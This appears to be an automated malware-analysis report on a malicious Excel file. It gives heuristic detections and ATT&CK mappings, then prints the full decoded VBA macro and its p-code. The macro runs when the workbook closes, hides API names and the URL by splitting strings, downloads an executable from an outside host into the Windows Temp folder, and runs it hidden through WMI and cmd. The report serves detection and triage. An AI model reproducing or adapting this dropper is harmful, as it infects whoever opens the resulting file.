MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The VBA macro within the Excel file is designed to download a file from 'https://office-files.pw/Dd1239fghH/f.exe' and save it as 'C:\Windows\Temp\d.exe'. It then attempts to execute this downloaded file using 'cmd.exe' via the Win32_Process WMI object. The obfuscation techniques used, such as string concatenation for API names and URLs, indicate a deliberate attempt to evade detection.
Heuristics 7
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
output.write request.responseBody -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Set request = CreateObject("Mi" + q + "LHT" + "TP") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set request = CreateObject("Mi" + q + "LHT" + "TP") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set process = GetObject("wi" + "nmgm" + "ts" + ":" + "W" + "in3" + "2" + "_" + "Pr" + "oce" + "ss") -
Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://office-files.pw/Dd1239fghH/f.exe Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5285 bytes |
SHA-256: 1ef8ae385ecc4ef8fe505ab9cf19721da4e6ac83ef8776c70a291b81552667bc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error Resume Next
Dim request
Dim q As String
q = "croso" + "ft.XM"
Set request = CreateObject("Mi" + q + "LHT" + "TP")
Dim t1 As String
t1 = "t"
Dim ff As String
ff = "pw/Dd1239fghH/f.e" + "xe"
request.Open "GET", "h" + "t" + "t" + "ps" + ":" + "/" + "/office" + "-files." + ff, False
request.Send
Dim sss As String
sss = "b" + "." + "Stream"
Set output = CreateObject("Ad" + "od" + sss)
Dim filename As String
filename = "C" + ":" + "\Wi" + "ndo" + "ws" + "\Te" + "mp\d" + "." + "exe"
output.Type = 1
output.Open
output.write request.responseBody
output.savetofile filename, 2
Set process = GetObject("wi" + "nmgm" + "ts" + ":" + "W" + "in3" + "2" + "_" + "Pr" + "oce" + "ss")
Dim path As String
path = "C" + ":" + "\Wi" + "ndo" + "ws" + "\Te" + "mp\"
Dim p1 As String
p1 = "/h" + "id"
Dim p2 As String
p2 = "/c " + "cd"
Result = process.Create("cm" + "d.e" + "xe " + p1 + " " + p2 + " " + path + " & " + " st" + "art d.e" + "xe", Null, Null, processid)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore_gkgc70d0
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 3256 bytes
' Line #0:
' FuncDefn (Sub Workbook_BeforeClose(Cancel As Boolean))
' Line #1:
' OnError (Resume Next)
' Line #2:
' Dim
' VarDefn request
' Line #3:
' Dim
' VarDefn q (As String)
' Line #4:
' LitStr 0x0005 "croso"
' LitStr 0x0005 "ft.XM"
' Add
' St q
' Line #5:
' SetStmt
' LitStr 0x0002 "Mi"
' Ld q
' Add
' LitStr 0x0003 "LHT"
' Add
' LitStr 0x0002 "TP"
' Add
' ArgsLd CreateObject 0x0001
' Set request
' Line #6:
' Dim
' VarDefn t1 (As String)
' Line #7:
' LitStr 0x0001 "t"
' St t1
' Line #8:
' Dim
' VarDefn ff (As String)
' Line #9:
' LitStr 0x0011 "pw/Dd1239fghH/f.e"
' LitStr 0x0002 "xe"
' Add
' St ff
' Line #10:
' LitStr 0x0003 "GET"
' LitStr 0x0001 "h"
' LitStr 0x0001 "t"
' Add
' LitStr 0x0001 "t"
' Add
' LitStr 0x0002 "ps"
' Add
' LitStr 0x0001 ":"
' Add
' LitStr 0x0001 "/"
' Add
' LitStr 0x0007 "/office"
' Add
' LitStr 0x0007 "-files."
' Add
' Ld ff
' Add
' LitVarSpecial (False)
' Ld request
' ArgsMemCall Open 0x0003
' Line #11:
' Ld request
' ArgsMemCall Send 0x0000
' Line #12:
' Dim
' VarDefn sss (As String)
' Line #13:
' LitStr 0x0001 "b"
' LitStr 0x0001 "."
' Add
' LitStr 0x0006 "Stream"
' Add
' St sss
' Line #14:
' SetStmt
' LitStr 0x0002 "Ad"
' LitStr 0x0002 "od"
' Add
' Ld sss
' Add
' ArgsLd CreateObject 0x0001
' Set Output
' Line #15:
' Dim
' VarDefn filename (As String)
' Line #16:
' LitStr 0x0001 "C"
' LitStr 0x0001 ":"
' Add
' LitStr 0x0003 "\Wi"
' Add
' LitStr 0x0003 "ndo"
' Add
' LitStr 0x0002 "ws"
' Add
' LitStr 0x0003 "\Te"
' Add
' LitStr 0x0004 "mp\d"
' Add
' LitStr 0x0001 "."
' Add
' LitStr 0x0003 "exe"
' Add
' St filename
' Line #17:
' LitDI2 0x0001
' Ld Output
' MemSt Type
' Line #18:
' Ld Output
' ArgsMemCall Open 0x0000
' Line #19:
' Ld request
' MemLd responseBody
' Ld Output
' ArgsMemCall Write 0x0001
' Line #20:
' Ld filename
' LitDI2 0x0002
' Ld Output
' ArgsMemCall savetofile 0x0002
' Line #21:
' SetStmt
' LitStr 0x0002 "wi"
' LitStr 0x0004 "nmgm"
' Add
' LitStr 0x0002 "ts"
' Add
' LitStr 0x0001 ":"
' Add
' LitStr 0x0001 "W"
' Add
' LitStr 0x0003 "in3"
' Add
' LitStr 0x0001 "2"
' Add
' LitStr 0x0001 "_"
' Add
' LitStr 0x0002 "Pr"
' Add
' LitStr 0x0003 "oce"
' Add
' LitStr 0x0002 "ss"
' Add
' ArgsLd GetObject 0x0001
' Set process
' Line #22:
' Dim
' VarDefn path (As String)
' Line #23:
' LitStr 0x0001 "C"
' LitStr 0x0001 ":"
' Add
' LitStr 0x0003 "\Wi"
' Add
' LitStr 0x0003 "ndo"
' Add
' LitStr 0x0002 "ws"
' Add
' LitStr 0x0003 "\Te"
' Add
' LitStr 0x0003 "mp\"
' Add
' St path
' Line #24:
' Dim
' VarDefn p1 (As String)
' Line #25:
' LitStr 0x0002 "/h"
' LitStr 0x0002 "id"
' Add
' St p1
' Line #26:
' Dim
' VarDefn p2 (As String)
' Line #27:
' LitStr 0x0003 "/c "
' LitStr 0x0002 "cd"
' Add
' St p2
' Line #28:
' LitStr 0x0002 "cm"
' LitStr 0x0003 "d.e"
' Add
' LitStr 0x0003 "xe "
' Add
' Ld p1
' Add
' LitStr 0x0001 " "
' Add
' Ld p2
' Add
' LitStr 0x0001 " "
' Add
' Ld path
' Add
' LitStr 0x0003 " & "
' Add
' LitStr 0x0003 " st"
' Add
' LitStr 0x0007 "art d.e"
' Add
' LitStr 0x0002 "xe"
' Add
' LitVarSpecial (Null)
' LitVarSpecial (Null)
' Ld processid
' Ld process
' ArgsMemLd Create 0x0004
' St Result
' Line #29:
' EndSub
' _VBA_PROJECT_CUR/VBA/Sheet1 - 991 bytes
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.